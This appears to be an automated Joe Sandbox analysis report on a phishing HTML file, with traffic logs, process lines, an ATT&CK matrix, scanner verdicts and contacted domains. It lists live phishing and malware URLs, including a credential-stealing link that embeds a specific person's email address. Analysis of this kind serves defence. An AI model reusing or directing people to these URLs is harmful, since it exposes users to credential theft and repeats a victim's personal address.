Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

System Summary

barindex
Source: Name includes: Play Aud.htmlInitial sample: play
Source: classification engineClassification label: mal72.phis.evad.winHTML@36/26@57/12
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play Aud.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,1515091250345096605,12797661667219854330,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,1515091250345096605,12797661667219854330,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.comHTTP Parser: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru/nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ100%Avira URL Cloudmalware
https://N6B.kolivane.ru/da4scmQ/#Mcaroline.vianna0%Avira URL Cloudsafe
https://n6b.kolivane.ru/da4scmQ/0%Avira URL Cloudsafe
https://n6b.kolivane.ru/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    google.com
    142.250.181.110
    truefalse
      high
      code.jquery.com
      151.101.66.137
      truefalse
        high
        n6b.kolivane.ru
        172.67.143.137
        truetrue
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru
            104.21.65.72
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                www.google.com
                142.250.181.68
                truefalse
                  high
                  www.microsoftonline.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                      high
                      https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                        high
                        https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.comtrue
                        • SlashNext: Credential Stealing type: Phishing & Social Engineering
                        unknown
                        https://n6b.kolivane.ru/da4scmQ/true
                        • Avira URL Cloud: safe
                        unknown
                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                          high
                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f6a50df68a942a0/1734977510149/7a7c9221e414bb907990faf400801d9af55b752240b1e78d2b1126445bca29d8/zSGry-N1tCBz7IVfalse
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6a50df68a942a0&lang=autofalse
                                high
                                https://n6b.kolivane.ru/favicon.icofalse
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7gfalse
                                  high
                                  https://a.nel.cloudflare.com/report/v4?s=Rl4SCA2DgqObEAwkj5k9HaCD8EW8bHJ3xyOFNTqDT%2FNg9JQ%2Bor16T2JwBe9kyrBUbCv%2FLpc56GGESLnoFo1betBslpfCZl7rdJ2tZra7ks274WpHMjHVziqSc53KkQ%3D%3Dfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/false
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5false
                                        high
                                        https://myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru/nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://N6B.kolivane.ru/da4scmQ/#Mcaroline.viannaPlay Aud.htmlfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.21.65.72
                                        myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ruUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.130.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        172.67.143.137
                                        n6b.kolivane.ruUnited States
                                        13335CLOUDFLARENETUStrue
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        151.101.66.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        142.250.181.68
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        35.190.80.1
                                        a.nel.cloudflare.comUnited States
                                        15169GOOGLEUSfalse
                                        172.67.189.38
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.17.25.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        IP
                                        192.168.2.5
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1580042
                                        Start date and time:2024-12-23 19:10:39 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 26s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowshtmlcookbook.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:6
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Play Aud.html
                                        Detection:MAL
                                        Classification:mal72.phis.evad.winHTML@36/26@57/12
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .html
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 173.194.220.84, 172.217.17.46, 172.217.19.170, 172.217.19.234, 172.217.17.74, 142.250.181.42, 142.250.181.106, 142.250.181.138, 172.217.17.42, 216.58.208.234, 172.217.19.202, 172.217.21.42, 142.250.181.74, 217.20.58.98, 192.229.221.95, 172.217.17.35, 23.218.208.109, 13.107.246.63, 4.245.163.56
                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Play Aud.html
                                        No simulations
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.21.65.72http://sharefileon.comGet hashmaliciousUnknownBrowse
                                          https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                            https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29tGet hashmaliciousUnknownBrowse
                                              REMITTANCE_10023Tdcj.htmlGet hashmaliciousUnknownBrowse
                                                https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                  http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                    https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                      https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                        Danellarealty 1052.htmlGet hashmaliciousUnknownBrowse
                                                          https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                            104.18.94.41Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                              7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                  YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                    https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                      https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                        http://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                          https://account.book-ver.oneGet hashmaliciousUnknownBrowse
                                                                            https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                                              https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                104.18.95.41Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                  7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                    https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                                      YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                                        https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                          https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                            https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                              https://account.book-ver.oneGet hashmaliciousUnknownBrowse
                                                                                                https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                  Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    cdnjs.cloudflare.comvFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.25.14
                                                                                                    https://qulatrics.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.17.25.14
                                                                                                    https://qulatrics.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.17.25.14
                                                                                                    http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                                    • 104.17.25.14
                                                                                                    https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                    • 104.17.24.14
                                                                                                    https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                    • 104.17.24.14
